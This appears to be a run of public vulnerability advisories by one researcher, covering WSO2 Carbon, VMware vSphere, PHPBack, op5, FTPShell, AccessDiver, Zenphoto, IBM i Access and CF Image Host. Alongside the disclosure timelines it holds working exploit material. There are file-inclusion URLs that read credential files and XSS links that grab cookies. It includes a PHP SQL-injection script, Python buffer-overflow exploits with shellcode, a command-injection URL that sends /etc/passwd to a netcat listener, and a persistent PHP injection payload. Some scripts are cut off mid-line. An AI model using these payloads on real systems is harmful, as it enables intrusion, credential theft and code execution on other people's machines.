BOOM! later, go back and login with your shiny new account. Disclosure Timeline: Vendor Notification: September 30, 2016 October 8, 2016 : Public Disclosure Exploitation Technique: === Local Severity Level: === High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
WSO2-CARBON v4.4.5 LOCAL FILE INCLUSION
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-LOCAL-FILE-INCLUSION.txt [+] ISR: ApparitionSec Vendor: === www.wso2.com Product: Ws02Carbon v4.4.5 WSO2 Carbon is the core platform on which WSO2 middleware products are built. It is based on Java OSGi technology, which allows components to be dynamically installed, started, stopped, updated, and uninstalled, and it eliminates component version conflicts. In Carbon, this capability translates into a solid core of common middleware enterprise components, including clustering, security, logging, and monitoring, plus the ability to add components for specific features needed to solve a specific enterprise scenario. Vulnerability Type: = Local File Inclusion (LFI) CVE Reference: == CVE-2016-4314 Vulnerability Details: = An authenticated user can download configuration files in the filesystem via downloadArchivedLogFiles operation in LogViewer admin service. The request to the admin service accepts a file path relative to the carbon log file directory (i.e. /repository/logs) hence can access any file in the file system. References: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0098 Example: accessing the registry.xml file via Local File Inclusion exposes the MySQL passwords. mysql-db jdbc:mysql://localhost:3306/regdb regadmin regadmin com.mysql.jdbc.Driver 80 6000 5 Exploit code(s): === LFI to read Database creds, truststore key file, web.xml etc... 1) Read MySQL creds https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/registry.xml== 2) Read MySQL creds https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/datasources/master-datasources.xml 3) Access Truststore Key file. https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/resources/security/client-truststore.jks 4) Read web.xml https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/tomcat/carbon/WEB-INF/web.xml Disclosure Timeline: === Vendor Notification: May 6, 2016 Vendor Acknowledgement: May 6, 2016 Vendor Fix / Customer Alerts: June 30, 2016 August 12, 2016 : Public Disclosure Exploitation Technique: === Local Severity Level: === High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
VMWare vSphere Web Client Flash XSS
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/VMWARE-VSPHERE-FLASH-XSS.txt [+] ISR: apparitionsec Vendor: === www.vmware.com Product: VMWare vSphere Web Client v5.1 - 6.0 A server virtualization platform from VMware. Also referred to as a cloud operating system or virtualized data center platform, VMware vSphere enables IT departments to efficiently place application workloads on the most cost-effective compute resource available VMware vSphere includes the VMware ESX / ESXi hypervisor, a type 1 hypervisor that functions as the virtualization server; the VMware vCenter Server, which manages vSphere environments; the VMware vSphere Client, which is used to install and manage virtual machines through the hypervisor; and VMware VMFS, the file system component from VMware. Vulnerability Type: Flash XSS CVE Reference: == CVE-2016-2078 Vulnerability Details: = VMWare vSphere Web Client is vulnerable to Flash based XSS through the loading of arbitrary .SWF files via 'flashvars' parameter. Flashvars is a Flash Player feature that allows passing of variables to the '_root' level of a Flash movie from the hosting webpage. Attackers can exploit this to call arbitrary Flash actionscript functions on the victims Flash Player client through attacker supplied SWF files that execute in the same security context as that of vSphere Web Client. e.g. flashvars: 'locale=en_US=en_US=locales/UI-en_US.swf=http%3A%2F%2Fattacker-site%2FEvil.swf', References: VMSA-2016-0006 http://www.vmware.com/security/advisories/VMSA-2016-0006.html Exploit code(s): === 1) Attacker server needs Flash policy file "crossdomain.xml" It grants Flash Player permission to talk to servers other than the one it's hosted on. This will allow victim server ability to talk to the evil server. e.g. 2) Send infected linx to the victim. https://victim:9443/vsphere-client/ui.jsp?resourceModuleURLs=http://attacker-site/Evil.swf Disclosure Timeline: = Vendor Notification: Jan 4, 2016 May 25, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: === 4.2 (Medium) CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N Description: Request Method(s):[+] GET Vulnerable Product: [+] VMWare 5.1 - 6.0 vsphere-client Vulnerable Parameter(s): [+] flashvars / resourceModuleURLs [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
PHPBack v1.3.0 SQL Injection
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PHPBACK-v1.3.0-SQL-INJECTION.txt Vendor: www.phpback.org Product: PHPBack v1.3.0 Vulnerability Type: === SQL Injection CVE Reference: == N/A Vulnerability Details: = PHPBack v1.3.0 is vulnerable to boolean blind and error based SQL Injection in the 'orderby' parameter. By sending SQL Injection query using MySQL XPATH function ExtractValue() we can grab information from the errors generated. This is useful when we get no output except MySQL errors, we can force data extraction through the error. When using ExtractValue() function to generate error, evaluated results of our SQL query will be embedded in query error message. Adding a colon "0x3a" to the beginning of the query will ensure parsing will always FAIL generating an error along with our extracted data. This method only works on MySQL version >= 5.1, we can then use SQL LIMIT function to move thru database informations. Users should upgrade to v1.3.1 https://github.com/ivandiazwm/phpback/releases Exploit code(s): === Run from CL... = 5.1 only # $email=$argv[1]; $pwd=$argv[2]; if($argc<3){ echo "PHPBack 1.3.0 SQL Injection POC\r\n"; echo "Outputs USER(), DATABASE() and VERSION() on XPATH Error!\r\n"; echo "Supported in MySQL >= 5.1 versions only\r\n"; echo "==\r\n"; echo "Enter Creds: \r\n"; echo "*** by hyp3rlinx *** \r\n"; exit(); } $target="localhost"; $creds="email=$email=$pwd"; $fp = fsockopen("localhost", 80, $errno, $errstr, 30); sock_chk($fp); #authenticate $out = "POST /phpback-1.3.0/action/login HTTP/1.0\r\n"; $out .= "Host: $target\r\n"; $out .= "Content-Type: application/x-www-form-urlencoded\r\n"; $out .= 'Content-Length: ' . strlen($creds) . "\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); fwrite($fp, $creds); $phpsess=""; $res=""; while (!feof($fp)) { $res .= fgets($fp, 128); if(strpos($res,"\r\n\r\n")!==FALSE){break;} } $sess=get_session($fp); function get_session($sock){ global $res; $idx=strpos($res,"PHPSESSID"); $sess=substr($res,$idx,38); return $sess; } #SQL Injection $sql="search=1=title,extractvalue(0x0a,concat(0x0a,(select USER()), 0x0a, (select DATABASE()), 0x0a, (select VERSION(\r\n"; $fp = fsockopen("localhost", 80, $errno, $errstr, 30); sock_chk($fp); $out = "POST /phpback-1.3.0/admin/ideas HTTP/1.0\r\n"; $out .= "Host: $target\r\n"; $out .= "Content-Type: application/x-www-form-urlencoded\r\n"; $out .= 'Content-Length: ' . strlen($sql) . "\r\n"; $out .= "Cookie: " . $sess."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); fwrite($fp, $sql); while (!feof($fp)) { echo fgets($fp, 128); } fclose($fp); function sock_chk(&$fp){ if (!$fp) {echo "Cant connect!";exit();} } ?> Disclosure Timeline: = Vendor Notification: April 17, 2016 Vendor Confirms: April 17, 2016 Vendor Release Fixed Version: April 19, 2016 April 19, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: Medium Description: == Request Method(s):[+] POST Vulnerable Product: [+] PHPBack v1.3.0 Vulnerable Parameter(s): [+] 'orderby' [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. All content (c) hyp3rlinx. by hyp3rlinx
op5 v7.1.9 Remote Command Execution
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/OP5-REMOTE-CMD-EXECUTION.txt Vendor: www.op5.com Product: === op5 v7.1.9 op5 Monitor is a software product for server, Network monitoring and management based on the open source Project Nagios. Vulnerability Type: Remote Command Execution CVE Reference: == N/A Vulnerability Details: = op5 has a CSRF entry point that can be used to execute arbitrary remote commands on op5 system sent via HTTP GET requests, allowing attackers to completely takeover the affected host, to be victimized a user must be authenticated and visit a malicious webpage or click an infected link... Reference: https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/ Exploit code(s): === trivial RCE cat /etc/passwd... using netcat nc.exe -vvlp > passwds.txt https://192.168.1.103/monitor/op5/nacoma/command_test.php?cmd_str=/bin/cat%20/etc/passwd%20|%20nc%20192.168.1.102%20 result: listening on [any] ... 192.168.1.103: inverse host lookup failed: h_errno 11004: NO_DATA connect to [192.168.1.102] from (UNKNOWN) [192.168.1.103] 56935: NO_DAT sent 0, rcvd 1343 C:\netcat-win32-1.12>type passwds.txt root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin smstools:x:499:499::/var/lib/smstools:/bin/bash postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash op5lsu:x:500:500::/home/op5lsu:/bin/bash saslauth:x:498:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin monitor:x:299:48::/opt/monitor:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin Disclosure Timeline: Vendor Notification: March 27, 2016 Vendor confirms vulnerability March 27, 2016 Vendor issue patched new release v7.2.0 April 5, 2016 April 6, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: High Description: = Request Method(s):[+] GET Vulnerable Product: [+] op5 v7.1.9 Vulnerable Parameter(s): [+] 'cmd_str' = [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. hyp3rlinx
FTPShell Client v5.24 Buffer Overflow
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/FTPSHELL-v5.24-BUFFER-OVERFLOW.txt Vendor: www.ftpshell.com Product: FTPShell Client version 5.24 FTPShell client is a windows file transfer program that enables users to reliably transfer files, upload to websites, and download updates from the internet. Vulnerability Type: === Buffer Overflow CVE Reference: == N/A Vulnerability Details: = ftpshell.exe client has a buffer overflow entry point in the 'Address' input field used to connect to an FTP server. Allowing local arbitrary code execution by overwriting several registers on the stack and controlling program execution flow. EIP register will be used to jump to our malicious shellcode which will be patiently waiting in ECX register. exploited registers dump... EAX 0021 ECX 0012E5B0 EDX 76F670B4 ntdll.KiFastSystemCallRet EBX 76244FC4 kernel32.76244FC4 ESP 0012E658 ASCII "calc.exe" <- BAM! EBP 7621E5FD kernel32.WinExec ESI 001D2930 EDI 76244FEC kernel32.76244FEC EIP 015FB945 C 0 ES 0023 32bit 0() P 1 CS 001B 32bit 0() A 0 SS 0023 32bit 0() Z 1 DS 0023 32bit 0() S 0 FS 003B 32bit 7FFDE000(FFF) T 0 GS NULL D 0 O 0 LastErr ERROR_SUCCESS () EFL 00200246 (NO,NB,E,BE,NS,PE,GE,LE) ST0 empty g ST1 empty g ST2 empty g ST3 empty g ST4 empty g ST5 empty g ST6 empty g ST7 empty g 3 2 1 0 E S P U O Z D I FST C5E1 Cond 1 1 0 1 Err 1 1 1 0 0 0 0 1 (Unordered) FCW 1372 Prec NEAR,64 Mask1 1 0 0 1 0 test stack dump (3b8.fa0): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for ftpshell.exe *** ERROR: Symbol file could not be found. Defaulted to export symbols for ftpshell.exe - eax=41414141 ebx=017ebc70 ecx=017ebc70 edx=0012ebc8 esi=0012ebc8 edi=017a9498 eip=41414141 esp=0012e928 ebp=0012ea70 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00210202 41414141 ?? ??? Exploit code(s): === import struct #FTPShell Client version 5.24 - www.ftpshell.com #Buffer Overflow Exploit #by hyp3rlinx #run to generate payload, then copy and inject #into the 'Address' field on the client and BOOM! #shellcode to pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") #payload="A"*2475+"R"*4+"\xcc"*100 #< control EIP register #find appropriate assembly instruction to call our payload JMP or CALL ECX. #!mona jmp -r ecx -m kernel32.dll eip=struct.pack('
AccessDiver V4.301 Buffer Overflow
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ACCESSDIVER-BUFFER-OVERFLOW.txt Vendor: == M. Jean Fages www.accessdiver.com circa 1998-2006 Product: = AccessDiver V4.301 build 5888 AccessDiver is a security tester for Web pages. It has got a set of tools which will verify the robustness of you accounts and directories. You will know if your customers, your users and you can use safely your web site. Vulnerability Type: === Buffer Overflow CVE Reference: == N/A Vulnerability Details: = AccessDiver is vulnerable to multiple buffer overflows, two vectors are described below. 1) buffer overflow @ 2073 bytes in URL field for Server / IP address and will overwrite NSEH and SEH exception handlers. EAX ECX 52525252 EDX 7C9037D8 ntdll.7C9037D8 EBX ESP 0012EA08 EBP 0012EA28 ESI EDI EIP 52525252 <- BOOM C 0 ES 0023 32bit 0() P 1 CS 001B 32bit 0() A 0 SS 0023 32bit 0() Z 1 DS 0023 32bit 0() S 0 FS 003B 32bit 7FFDF000(FFF) T 0 GS NULL D 0 O 0 LastErr ERROR_SUCCESS () EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) ST0 empty ST1 empty ST2 empty ST3 empty ST4 empty ST5 empty ST6 empty ST7 empty 3 2 1 0 E S P U O Z D I FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ) FCW 1272 Prec NEAR,53 Mask1 1 0 0 1 0 2) Buffer overflow when loading a malicious "Exploit zone file" text file containing 2080 bytes, load text file from "Weak History" Menu choose Import "from File" choose exploit text file and BOOM! EAX ECX 52525242 EDX 7702B4AD ntdll.7702B4AD EBX ESP 0018E940 EBP 0018E960 ESI EDI EIP 52525242 <- KABOOM C 0 ES 002B 32bit 0() P 1 CS 0023 32bit 0() A 0 SS 002B 32bit 0() Z 1 DS 002B 32bit 0() S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0() D 0 O 0 LastErr ERROR_SUCCESS () EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE) ST0 empty g ST1 empty g ST2 empty g ST3 empty g ST4 empty g ST5 empty g ST6 empty g ST7 empty g 3 2 1 0 E S P U O Z D I FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ) FCW 1372 Prec NEAR,64 Mask1 1 0 0 1 0 Windbg dump... (2abc.2330): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax= ebx= ecx=52525252 edx=7702b4ad esi= edi= eip=52525252 esp=0018e7f4 ebp=0018e814 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 52525252 ?? ??? Disclosure Timeline: = Vendor Notification: NA December 26, 2015 : Public Disclosure Exploitation Technique: === Local Severity Level: Med === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
phpback v1.1 XSS vulnerability
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PHPBACK-XSS.txt Vendor: www.phpback.org Product: === phpback v1.1 The open source feedback system, PHPBack is feedback a web application that you can easily implement on your website. It gives your customers a way to communicate their ideas to improve your products. Vulnerability Type: == Cross site scripting - XSS CVE Reference: == N/A Vulnerability Details: == XSS vulnerability exist in search field 'query' parameter allowing arbitrary client side JS code execution on victims who click our infected linx or visit our infected webpage. Session ID theft may follow as well as possibility to bypass CSRF protections etc... XSS Exploit code(s): === http://localhost/phpback_v1.1/phpback-1.1c/home/search; method="POST"> document.getElementById('InFeCT0r').submit() Disclosure Timeline: = Vendor Notification: December 11, 2015 December 15, 2015 : Public Disclosure Exploitation Technique: === Remote Severity Level: High Description: = Request Method(s): [+] POST Vulnerable Product: [+] phpback v1.1 Vulnerable Parameter(s):[+] query [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Zenphoto 1.4.10 Local File Inclusion
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ZEN-PHOTO-1.4.10-LFI.txt Vendor: www.zenphoto.org Product: === Zenphoto 1.4.10 Vulnerability Type: Local File Inclusion CVE Reference: == N/A Vulnerability Details: == Zen Photos pluginDoc.php PHP file is vulnerable to local file inclusion that allows attackers to read arbitrary server files outside of the current web directory by injecting "../" directory traversal characters, which can lead to sensitive information disclosure, code execution or DOS on the victims web server. Local File Inclusion Codes: == http://localhost/zenphoto-zenphoto-1.4.10/zp-core/pluginDoc.php?thirdparty=1=../../../xampp/phpinfo Disclosure Timeline: = Vendor Notification: November 10, 2015 December 1, 2015 : Public Disclosure Exploitation Technique: === Local Severity Level: High Description: = Request Method(s): [+] GET Vulnerable Product: [+] Zenphoto 1.4.10 Vulnerable Parameter(s):[+] extension [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Zenphoto 1.4.10 XSS Vulnerability
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ZEN-PHOTO-1.4.10-XSS.txt Vendor: www.zenphoto.org Product: === Zenphoto 1.4.10 Vulnerability Type: == Cross site scripting - XSS CVE Reference: == N/A Vulnerability Details: == Multiple XSS entry points exist allowing arbitrary client side JS code execution on victims who click our infected linx. Session ID and data theft may follow as well as possibility to bypass CSRF protections, injection of iframes to establish communication channels etc... XSS Exploit code(s): === 1) http://localhost/zenphoto-zenphoto-1.4.10/zp-core/admin-plugins.php?tab=%22%22%20onMouseMove=%22alert%28%27XSS%20hyp3rlinx%20Nov%205,%202015\n%27%2bdocument.cookie%29%22%20=666 2) http://localhost/zenphoto-zenphoto-1.4.10/zp-core/admin-options.php?page=options=plugin=%22%20onMouseMove=%22alert%28%27XSS%20hyp3rlinx\n%27%2bdocument.cookie%29%22 3) http://localhost/zenphoto-zenphoto-1.4.10/zp-core/admin.php?msg=hyp3rlinx=external=%22+onMouseMove%3D%22alert%28%27hyp3rlinx%20\n\n%20%27%2bdocument.cookie%29%3B Disclosure Timeline: = Vendor Notification: November 10, 2015 December 1, 2015 : Public Disclosure Exploitation Technique: === Remote Severity Level: High Description: = Request Method(s): [+] GET Vulnerable Product: [+] Zenphoto 1.4.10 Vulnerable Parameter(s):[+] tab, single, error [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
IBM i Access Buffer Overflow Code DOS CVE-2015-7422
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI-ACCESS-BUFFER-OVERFLOW-DOS.txt Vendor: == www.ibm.com Product: IBM i Access for Windows Release 7.1 of IBM i Access for Windows is affected Vulnerability Type: Stack Buffer Overflow DOS CVE Reference: == CVE-2015-7422 Vulnerability Details: = IBM i Access for Windows vulnerable to a buffer overflow, caused by improper bounds checking. A local attacker could overflow a buffer and cause the program to crash. Remediation/Fixes The issue can be fixed by obtaining and applying the Service Pack SI57907. The buffer overflow vulnerability can be remediated by applying Service Pack SI57907. The Service Pack is available at: http://www-03.ibm.com/systems/power/software/i/access/windows_sp.html Workarounds and Mitigations None known CVSS Base Score: 4 CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/107770 for the current score CVSS Environmental Score*: Undefined CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) Disclosure Timeline: Vendor Notification: May 21, 2015 November 18, 2015 : Public Disclosure Exploitation Technique: === Local Severity Level: Med Description: == Request Method(s): [+] local Vulnerable Product: [+] IBM i Access for Windows Release 7.1 Affected Area(s): [+] IBMI i Access [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
IBM i Access Buffer Overflow Code Exec CVE-2015-2023
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI-CLIENT-ACCESS-BUFFER-OVERFLOW.txt Vendor: == www.ibm.com Product: IBM i Access for Windows Release 7.1 of IBM i Access for Windows is affected Vulnerability Type: === Stack Buffer Overflow Arbitrary Code Exec CVE Reference: == CVE-2015-2023 Vulnerability Details: = IBM i Access for Windows is vulnerable to a buffer overflow. A local attacker could overflow a buffer and execute arbitrary code on the Windows PC. client Access has ability to receive remote commands via "Cwbrxd.exe" service Ref: http://www-01.ibm.com/support/docview.wss?uid=nas8N1019253 "Incoming remote command was designed for running non-interactive commands and programs on a PC", therefore a remote attacker could execute arbitrary code on the system. Remediation/Fixes The issue can be fixed by obtaining and applying the Service Pack SI57907. The buffer overflow vulnerability can be remediated by applying Service Pack SI57907. The Service Pack is available at: http://www-03.ibm.com/systems/power/software/i/access/windows_sp.html Workarounds and Mitigations None known CVSS Base Score: 4.4 CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/104044 for the current score CVSS Environmental Score*: Undefined CVSS Vector: (AV:L/AC:M/Au:N/C:P/I:P/A:P) Exploit code(s): == Three python POC scriptz follow that exploitz various component of IBM i Access. 1) Exploits "ftdwprt.exe", direct EIP overwrite import struct,os,subprocess pgm="C:\\Program Files (x86)\\IBM\\Client Access\\AFPViewr\\ftdwprt.exe " #shellcode to pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") # use jmp or call esp in FTDBT.dll under AFPviewer for Client Access # we find ---> 0x638091df : jmp esp | {PAGE_EXECUTE_READ} [FTDBDT.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.05.04.00 (C:\Program Files (x86)\IBM\Client Access\AFPViewr\FTDBDT.dll) rp=struct.pack('
CF Image Host XSS
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-XSS.txt Vendor: codefuture.co.uk/projects/imagehost Product: === CF Image Host 1.65 - 1.6.6 Archive download listed as: version 1.65 unzips as imagehost 1.6.6 Vulnerability Type: == Cross site scripting - XSS CVE Reference: == N/A Vulnerability Details: = Multiple reflected XSS entry points exist allowing arbitrary client side browser code execution on victims who click our infected linx. Undermining the trust between the client and server, possibly leading to information theft, drop malware, steal session cookies etc... XSS Exploit code(s): === 1) http://localhost/imagehost1.6.6/admin.php?act=images=%22%20onMouseMove=%22alert%280%29 2) http://localhost/imagehost1.6.6/admin.php?act=edit=%22%20onMouseMove=%22alert%280%29 3) http://localhost/imagehost1.6.6/admin.php?act=images=%22%20onMouseMove=%22alert%280%29 Disclosure Timeline: = Vendor Notification: NA November 14, 2015 : Public Disclosure Exploitation Technique: === Remote Severity Level: Medium Description: = Request Method(s): [+] GET Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6 Vulnerable Parameter(s):[+] orderBy, id, ip [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
CF Image Host PHP Command Injection
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-PHP-CMD-INJECTION.txt Vendor: codefuture.co.uk/projects/imagehost Product: === CF Image Host 1.65 - 1.6.6 Archive download listed as: version 1.65 unzips as imagehost 1.6.6 Vulnerability Type: = PHP Command Injection CVE Reference: == N/A Vulnerability Details: = CF Imagehost allows users who have access to the management area the ability to write directly to the 'set.php' page under the /inc directory that stores setting values for the 'Site Title', 'Site Slogan' etc, this allows a local attacker ability to inject specially crafted PHP command payloads to execute arbitrary operating system commands on the victim host. Possibly leading to privilege escalation, RFI, backdoors etc.. and most likely full compromise of the affected system or shared environment if applicable. PHP Command Injection Exploit code(s): = Under the setting tab we can inject following below PHP code and it will remain persistent as it is written disk in 'set.php', afterwards when the victim visits the application and click a tab the persistent OS command will be executed. 1) navigate to CF image host settings tab http://localhost/imagehost1.6.6/admin.php?act=set 2) click on admin menu on left and enter your passwords DO NOT click 'Save changes' yet! or you get error message to enter creds 3) now go back to settings tab and click 'General' then inject below PHP code into the 'Site Title' input field 4) now click 'Save Changes', this code will get stored under /inc directory within the 'set.php' PHP file. our PHP injection payload needs the single quotes, double back slashes, semicolons as described below to correctly escape the syntax so we do not break the PHP page and cause errors, our extra \\ quoutes and ; gets removed after injection takes place. some examples... ';echo exec("c:\\Windows\\system32\\calc.exe");'';'; 'set.php' on line 11 then becomes: $settings['SET_TITLE'] = '';echo 